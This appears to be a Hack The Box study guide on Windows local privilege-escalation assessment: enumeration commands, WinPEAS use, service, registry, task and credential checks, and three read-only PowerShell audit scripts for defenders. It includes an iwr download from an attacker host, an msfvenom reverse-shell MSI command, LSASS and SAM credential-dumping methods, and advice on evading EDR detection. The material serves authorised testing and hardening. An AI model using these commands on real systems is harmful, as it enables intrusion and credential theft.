Windows Vulnerability Assessment

#Overview

Windows vulnerability assessment evaluates the local host configuration for privilege escalation opportunities after gaining an initial foothold. Unlike Active Directory misconfiguration assessment -- which focuses on domain-wide relationships -- this phase examines the specific machine you are on for patch levels, service permissions, scheduled tasks, registry configurations, and credential storage weaknesses.

The core methodology is: enumerate the OS version and installed patches, check for known missing critical updates, analyze service and task permissions, review registry configurations for privilege escalation vectors, and assess credential protection mechanisms. Tools like WinPEAS automate much of this collection, but the analyst must interpret the output and identify viable escalation paths.

On HTB, common Windows privilege escalation patterns include: SeImpersonatePrivilege leading to JuicyPotato/PrintSpoofer exploitation, AlwaysInstallElevated registry keys enabling MSI-based execution, unquoted service paths with writable parent directories, and discovered auto-logon credentials (Sauna -- WinPEAS found auto-logon password for a DCSync-capable user).

#Prerequisites

  • Low-privileged shell on a Windows machine (cmd, PowerShell, or WinRM)
  • Ability to upload files to the target (HTTP server, SMB share, certutil, bitsadmin)
  • Access to WinPEAS, accesschk, and PowerShell-based enumeration scripts
  • Metasploit post-exploitation modules (optional, for privilege escalation detection)
  • WES-NG (Windows Exploit Suggester Next Generation) for offline patch analysis

#Detection and Enumeration

#Step 1: Gather OS and Patch Information

Start with basic system information:

cmd.exe:

```cmd
systeminfo
wmic qfe list brief
wmic os get version, caption, buildnumber
hostname
whoami /all
net user %username%
```

PowerShell:

```powershell
Get-HotFix
Get-ComputerInfo
[System.Environment]::OSVersion.Version
$PSVersionTable
```

The systeminfo output provides the OS version and every installed hotfix. Copy this output to a file for WES-NG analysis.

#Step 2: Offline Patch Analysis with WES-NG

WES-NG compares installed patches against the Microsoft Security Bulletin database:

```bash
# On attacker machine
python3 wes.py systeminfo.txt --impact "Elevation of Privilege" --severity critical
python3 wes.py systeminfo.txt --hide "Internet Explorer" | grep -i "Elevation"
```

WES-NG identifies missing patches that could yield privilege escalation. Each finding includes the MS bulletin ID, CVE, and a link to the Microsoft advisory. Prioritize vulnerabilities with "Elevation of Privilege" impact and "Critical" severity.

#Step 3: Run Automated Enumeration with WinPEAS

WinPEAS is the most comprehensive local Windows enumeration tool:

```powershell
# Download the binary to disk, run it, and capture the output to a file
# (-OutFile must be spelled out: a bare -o is ambiguous with -OutVariable/-OutBuffer)
iwr http://<attacker_IP>:8000/winPEASany.exe -OutFile winpeas.exe
.\winpeas.exe > peas_output.txt
```

WinPEAS checks over 200 privilege escalation vectors including:

  • Current user privileges (special attention to SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege)
  • Auto-logon credentials (registry: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon)
  • AlwaysInstallElevated registry keys
  • Service permissions and unquoted service paths
  • Scheduled tasks and their run-as context
  • Credentials in files, registry, and PowerShell history
  • DLL hijacking opportunities
  • PATH directories with writable permissions
  • UAC, AppLocker, and Credential Guard status

Example from Sauna (HTB): WinPEAS identified auto-logon credentials in the registry for a user (svc_loanmgr) who had DCSync rights, enabling direct escalation from local user to Domain Admin.

#Step 4: Service Permission Analysis

Check service configurations for privilege escalation vectors:

```cmd
REM List all services
sc query state= all

REM Check individual service configuration
sc qc <service_name>

REM accesschk (Sysinternals) for service permissions
accesschk.exe /accepteula -uwcqv <user> <service_name>
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
```

Key service vulnerabilities to identify:

  • Unquoted service paths containing spaces: for C:\Program Files\My App\app.exe, Windows tries C:\Program.exe, then C:\Program Files\My.exe, then the full path, so a writable C:\ or C:\Program Files is enough to hijack the service
  • Writable service binaries or service directories
  • SERVICE_CHANGE_CONFIG permission on a service -> change the binary path to your payload
  • SERVICE_START and SERVICE_STOP permissions -> restart a service with a modified binary

#Step 5: Registry Analysis for Privilege Escalation

Critical registry keys to check:

AlwaysInstallElevated:

```cmd
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

If both return 0x1, MSI files can be installed as SYSTEM. Generate a malicious MSI with msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o shell.msi.

UAC Configuration:

```cmd
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
```

Check values: EnableLUA (should be 1), ConsentPromptBehaviorAdmin (should be 2 for secure), and PromptOnSecureDesktop (should be 1).

PowerShell and Scripting Restrictions:

```powershell
$ExecutionContext.SessionState.LanguageMode  # ConstrainedLanguage = restricted
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections
Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell"
```

LSA Protection:

```cmd
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
```

A value of 1 indicates LSA Protection is enabled, blocking Mimikatz from reading LSASS memory.

WDigest Configuration:

```cmd
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
```

If set to 1 (or missing), credentials are stored in plaintext in LSASS memory.

Credential Guard:

```powershell
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
```

Credential Guard isolates LSASS in a virtualized environment (VBS), preventing credential dumping.
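The individual reg query commands above are easy to run but tedious to compare against a baseline. The following read-only audit script is an added example, not part of the original module or of any tool it references: it reads every registry value from Step 5 in one pass, prints the actual value next to the hardened value the text above expects (ConsentPromptBehaviorAdmin = 2, RunAsPPL = 1, and so on), and queries Win32_DeviceGuard for Credential Guard. It assumes PowerShell 5.1 or later on Windows 10 / Server 2016 or newer.

```powershell
# Added example (not the module's own code): registry audit for the Step 5 settings.

function Get-RegValueOrNull {
    param([string]$Path, [string]$Name)
    # A missing key or value returns $null instead of throwing, so the audit continues
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Get-PrivEscRegistryAudit {
    $uac = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    # Expected lists the values that count as hardened; $null means "value absent"
    $checks = @(
        @{ Check = 'AlwaysInstallElevated (HKLM)'; Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
           Name = 'AlwaysInstallElevated'; Expected = @($null, 0); Note = '1 in both hives lets any user install an MSI as SYSTEM' }
        @{ Check = 'AlwaysInstallElevated (HKCU)'; Path = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
           Name = 'AlwaysInstallElevated'; Expected = @($null, 0); Note = 'both hives must be 1 for the weakness to apply' }
        @{ Check = 'UAC EnableLUA'; Path = $uac; Name = 'EnableLUA'; Expected = @(1); Note = '0 disables UAC entirely' }
        @{ Check = 'UAC ConsentPromptBehaviorAdmin'; Path = $uac; Name = 'ConsentPromptBehaviorAdmin'
           Expected = @(2); Note = '2 = prompt for credentials on the secure desktop' }
        @{ Check = 'UAC PromptOnSecureDesktop'; Path = $uac; Name = 'PromptOnSecureDesktop'
           Expected = @(1); Note = '1 keeps the elevation prompt on the secure desktop' }
        @{ Check = 'LSA Protection (RunAsPPL)'; Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
           Name = 'RunAsPPL'; Expected = @(1, 2); Note = '1 (2 = UEFI-locked) runs LSASS as a protected process' }
        @{ Check = 'WDigest UseLogonCredential'; Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
           Name = 'UseLogonCredential'; Expected = @(0); Note = '1 keeps cleartext credentials in LSASS; set 0 explicitly' }
    )
    foreach ($c in $checks) {
        $actual = Get-RegValueOrNull -Path $c.Path -Name $c.Name
        $actualText = if ($null -eq $actual) { '<absent>' } else { [string]$actual }
        $expectedText = ($c.Expected | ForEach-Object { if ($null -eq $_) { '<absent>' } else { [string]$_ } }) -join ' or '
        $status = if ($c.Expected -contains $actual) { 'OK' } else { 'WEAK' }
        [pscustomobject]@{
            Check    = $c.Check
            Actual   = $actualText
            Expected = $expectedText
            Status   = $status
            Note     = $c.Note
        }
    }
}

function Test-CredentialGuardRunning {
    # SecurityServicesRunning contains 1 when Credential Guard is active (2 is HVCI)
    $dg = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard -ErrorAction SilentlyContinue
    return [bool]($dg -and $dg.SecurityServicesRunning -contains 1)
}

Get-PrivEscRegistryAudit | Format-Table -AutoSize
"Credential Guard running: $(Test-CredentialGuardRunning)"
```

Run it from the low-privileged shell during assessment, or from a scheduled job on a hardened baseline image to catch drift; every WEAK row maps directly to one of the escalation vectors described in this step.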

#Step 6: Credential and Sensitive File Discovery

Search for stored credentials and sensitive files:

```cmd
REM PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

REM Saved RDP connections
cmdkey /list

REM Unattend files (Windows setup artifacts)
dir /s C:\Windows\Panther\Unattend*.xml
dir /s C:\Windows\Panther\Autounattend*.xml
dir /s C:\Windows\System32\sysprep\Unattend*.xml

REM Group Policy Preferences (cpassword attribute)
findstr /s /i cpassword C:\Windows\SYSVOL\*.xml
```

On Timelapse, PowerShell history revealed svc_deploy credentials. On Sauna, WinPEAS found auto-logon credentials in the registry. On Access, saved credentials in Outlook personal archives and Access databases yielded user passwords.
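The findstr sweep above tells you that a cpassword attribute exists somewhere, but not which GPO or account it belongs to. The script below is an added example, not part of the original module: it parses every Group Policy Preference XML file under a root directory and reports the GPO GUID, file, account name and last-changed date for each element that carries a cpassword attribute, which is what a defender needs to track down and remove the stale preference. It assumes PowerShell 5.1 or later and that the SYSVOL path is readable; the default root is the local SYSVOL folder and a UNC path such as \\<domain>\SYSVOL (placeholder) can be passed instead.

```powershell
# Added example (not the module's own code): locate GPP items that still carry cpassword.

function Find-GppCpassword {
    param([string]$Root = "$env:SystemRoot\SYSVOL")
    Get-ChildItem -Path $Root -Filter *.xml -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # Skip files that are not well-formed XML rather than aborting the sweep
            try { [xml]$doc = Get-Content -LiteralPath $file.FullName -Raw } catch { return }
            # Any element with a cpassword attribute: Groups.xml, Services.xml,
            # ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml all use it
            foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
                $gpo = if ($file.FullName -match '\{[0-9A-Fa-f-]{36}\}') { $Matches[0] } else { '<unknown>' }
                [pscustomobject]@{
                    GPO     = $gpo
                    File    = $file.FullName
                    # The account attribute differs per preference type; take the first present
                    Account = ($node.userName, $node.accountName, $node.runAs | Where-Object { $_ } | Select-Object -First 1)
                    # The timestamp lives on the enclosing item element, not on <Properties>
                    Changed = $node.ParentNode.changed
                    # Length 0 means the attribute is present but empty (password already cleared)
                    Length  = ([string]$node.cpassword).Length
                }
            }
        }
}

Find-GppCpassword | Format-Table -AutoSize
```

Because the AES key used for cpassword is public, any non-empty result is a credential disclosure; the fix is to delete the preference item and rotate the account, not just to clear the attribute.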

#Step 7: Scheduled Task and Auto-Run Analysis

```cmd
REM Scheduled tasks
schtasks /query /fo LIST /v

REM Auto-run entries
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```

Look for:

  • Tasks running as SYSTEM that execute scripts from writable paths
  • Tasks that invoke scripts or binaries from user-writable directories
  • Auto-run entries pointing to executables in writable locations
  • Missing DLLs in a task's execution directory
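The service checks in Step 4 and the task and auto-run checks in Step 7 all reduce to one question: can a low-privileged user write to a directory from which a privileged process will load its executable? The script below is an added example that is not part of the original module or of WinPEAS; it covers both steps with a single writability probe. For each service, elevated scheduled task and Run-key entry it extracts the executable, expands the unquoted-path search order described in Step 4 (C:\Program.exe, C:\Program Files\My.exe, ...), adds the binary's own directory, and reports every location the current user can write to. It assumes PowerShell 5.1 or later with the built-in ScheduledTasks module and is read-only apart from a temporary probe file that it immediately deletes.

```powershell
# Added example (not the module's own code): writable-path audit for services, tasks and Run keys.

function Test-PathWritable {
    param([Parameter(Mandatory)][string]$Path)
    # Probe by creating and deleting a temp file; this honours group membership and
    # inherited ACEs, which a hand-rolled Get-Acl comparison easily gets wrong
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path -Path $Path -ChildPath ("acl_probe_{0}.tmp" -f [guid]::NewGuid())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Get-ExecutableFromCommand {
    param([string]$Command)
    # Quoted paths are taken verbatim; unquoted ones are cut at the first ".exe"
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^\s*(.*?\.exe)') { return $Matches[1] }
    return $Command.Trim()
}

function Get-WeakExecutionPath {
    param([string]$Source, [string]$Name, [string]$RunsAs, [string]$Command)
    $exe = Get-ExecutableFromCommand -Command $Command
    $dirs = @()
    if ($Command -notmatch '^\s*"' -and $exe -match ' ') {
        # Unquoted path with spaces: each space yields a candidate Windows tries first
        $parts = $exe.Split(' ')
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $dirs += Split-Path -Path ($parts[0..($i - 1)] -join ' ') -Parent
        }
    }
    $dirs += Split-Path -Path $exe -Parent   # directory holding the real binary
    foreach ($d in ($dirs | Where-Object { $_ } | Select-Object -Unique)) {
        if (Test-PathWritable -Path $d) {
            [pscustomobject]@{ Source = $Source; Name = $Name; RunsAs = $RunsAs; Executable = $exe; WritableDir = $d }
        }
    }
}

function Get-WritableServicePath {
    Get-CimInstance -ClassName Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
        $cmd = [System.Environment]::ExpandEnvironmentVariables($_.PathName)
        Get-WeakExecutionPath -Source 'Service' -Name $_.Name -RunsAs $_.StartName -Command $cmd
    }
}

function Get-WritableTaskPath {
    # Only tasks that run as SYSTEM, an administrator, or with the highest run level matter
    Get-ScheduledTask |
        Where-Object { $_.Principal.UserId -match 'SYSTEM|Administrator' -or $_.Principal.RunLevel -eq 'Highest' } |
        ForEach-Object {
            $task = $_
            foreach ($a in $task.Actions) {
                if ($a.Execute) {   # COM-handler actions have no Execute property
                    $cmd = [System.Environment]::ExpandEnvironmentVariables($a.Execute)
                    Get-WeakExecutionPath -Source 'Task' -Name $task.TaskName -RunsAs $task.Principal.UserId -Command $cmd
                }
            }
        }
}

function Get-WritableRunKeyPath {
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "$($hive):\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        # Drop the PSPath/PSParentPath/... noise that Get-ItemProperty adds
        foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
            $cmd = [System.Environment]::ExpandEnvironmentVariables([string]$p.Value)
            Get-WeakExecutionPath -Source "Run ($hive)" -Name $p.Name -RunsAs 'each user at logon' -Command $cmd
        }
    }
}

@(Get-WritableServicePath) + @(Get-WritableTaskPath) + @(Get-WritableRunKeyPath) | Format-Table -AutoSize
```

Every row is a finding to verify by hand: a writable directory early in an unquoted service path is exploitable only if the service runs as a privileged account and can be restarted, which is exactly the SERVICE_START / SERVICE_STOP check accesschk answers in Step 4.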

#Step 8: DLL Hijacking Opportunities

Identify processes that load DLLs from user-writable directories:

  1. Find a service or application that runs as SYSTEM
  2. Use ProcMon (Process Monitor) to identify missing DLLs or DLLs loaded from writable directories
  3. Place a malicious DLL in the search path

Common DLL hijacking targets: wlbsctrl.dll (IKEEXT service), TSMSISrv.dll (SessionEnv service).

#Assessment Methodology

#Privilege Escalation Strategy by Privilege

Prioritize based on the current user's privileges:

| Privilege | Exploitation Method |
| --- | --- |
| SeImpersonatePrivilege | JuicyPotato, RoguePotato, PrintSpoofer, SweetPotato |
| SeAssignPrimaryTokenPrivilege | Same as SeImpersonate, Potato family |
| SeBackupPrivilege | Copy SAM/SYSTEM hives, then secretsdump |
| SeRestorePrivilege | Overwrite system files with malicious versions |
| SeTakeOwnershipPrivilege | Take ownership of SYSTEM-owned files and replace |
| SeDebugPrivilege | Access LSASS process memory, dump credentials |
| SeLoadDriverPrivilege | Load a malicious kernel driver |
| SeShutdownPrivilege | Not directly useful for escalation |
| SeIncreaseQuotaPrivilege | Combine with other exploits |

#Privilege Escalation Strategy by OS Version

| OS Version | Common Vectors |
| --- | --- |
| Windows Server 2016/2019/2022 | Service misconfigurations, SeImpersonate (Potato), AD abuse, GPP cpassword, WES-NG findings |
| Windows 10/11 | UAC bypass, AutoElevate binaries, AlwaysInstallElevated, DLL hijacking |
| Older (2008, 2012) | Kernel exploits (MS16-032, MS15-051, CVE-2020-1472 ZeroLogon), more Potato variants |

#Common Pitfalls

  • Pitfall: Running WinPEAS and stopping without interpreting the output. The tool's color coding is a guide, not a verdict. Fix: Review every red/yellow finding manually; verify whether each finding is exploitable in your context.
  • Pitfall: Assuming systeminfo output alone is sufficient for patch analysis. Hotfix IDs can be misleading; backported patches on updated systems may not match the KB article naming convention. Fix: Use WES-NG which cross-references by build number and file version, not just KB IDs.
  • Pitfall: Ignoring whoami /priv output. A user with SeImpersonatePrivilege and a writable upload directory is often one Potato exploit away from SYSTEM. Fix: Always run whoami /all first and prioritize based on enabled privileges.
  • Pitfall: Not checking for credentials in PowerShell history. On Timelapse, the entire privilege escalation chain started from ConsoleHost_history.txt. Fix: Always check PowerShell history, saved RDP credentials, and unattended installation files.
  • Pitfall: Running kernel exploits on production systems without testing. Kernel exploits (MS16-032, MS15-051) are unreliable and can cause BSOD. Fix: Exhaust service, task, and registry-based escalation first; use kernel exploits as a last resort.

#OPSEC Considerations

  • Detection: Uploading and running WinPEAS generates process creation events and file artifacts. Many EDR solutions flag WinPEAS by name and hash. Fix: Rename the executable before upload, execute from memory when possible.
  • Detection: accesschk queries service permissions and generates audit events. The -v (verbose) flag increases detection footprint. Fix: Run without verbose output and target specific services.
  • Detection: Enumerating PowerShell history and saved credentials is low-noise and rarely triggers alerts. This is the safest form of enumeration.
  • Detection: Running WES-NG on the attacker's machine from a captured systeminfo file generates zero noise on the target.

#Cross-References

#Tool References

| Tool | Link |
| --- | --- |
| WinPEAS | https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS |
| WES-NG | https://github.com/bitsadmin/wesng |
| accesschk (Sysinternals) | https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk |
| JuicyPotato NG | https://github.com/antonioCoco/JuicyPotatoNG |
| PrintSpoofer | https://github.com/itm4n/PrintSpoofer |
| PowerUp (PowerSploit) | https://github.com/PowerShellMafia/PowerSploit |
| Seatbelt | https://github.com/GhostPack/Seatbelt |
| ProcMon (Sysinternals) | https://learn.microsoft.com/en-us/sysinternals/downloads/procmon |
| Mimikatz | https://github.com/gentilkiwi/mimikatz |

#Source Machines

  • Sauna (Easy) -- WinPEAS discovered auto-logon credentials in registry, leading to DCSync-capable user
  • ServMon (Easy) -- NSClient++ web app privilege escalation to SYSTEM via script execution + service restart
  • Access (Easy) -- Saved credentials in Outlook PST files and Microsoft Access databases, DPAPI credential extraction
  • Timelapse (Easy) -- PowerShell history file disclosure (ConsoleHost_history.txt), LAPS_Readers group for Administrator password
  • Support (Easy) -- .NET binary decompilation (ILSpy) to discover hardcoded LDAP credentials
  • Escape (Medium) -- MSSQL service log file (ERRORLOG.bak) containing rejected password attempt, Certify for ADCS enumeration
  • Rebound (Insane) -- Cross-session NTLM relay, gMSA password extraction, RBCD-based impersonation chain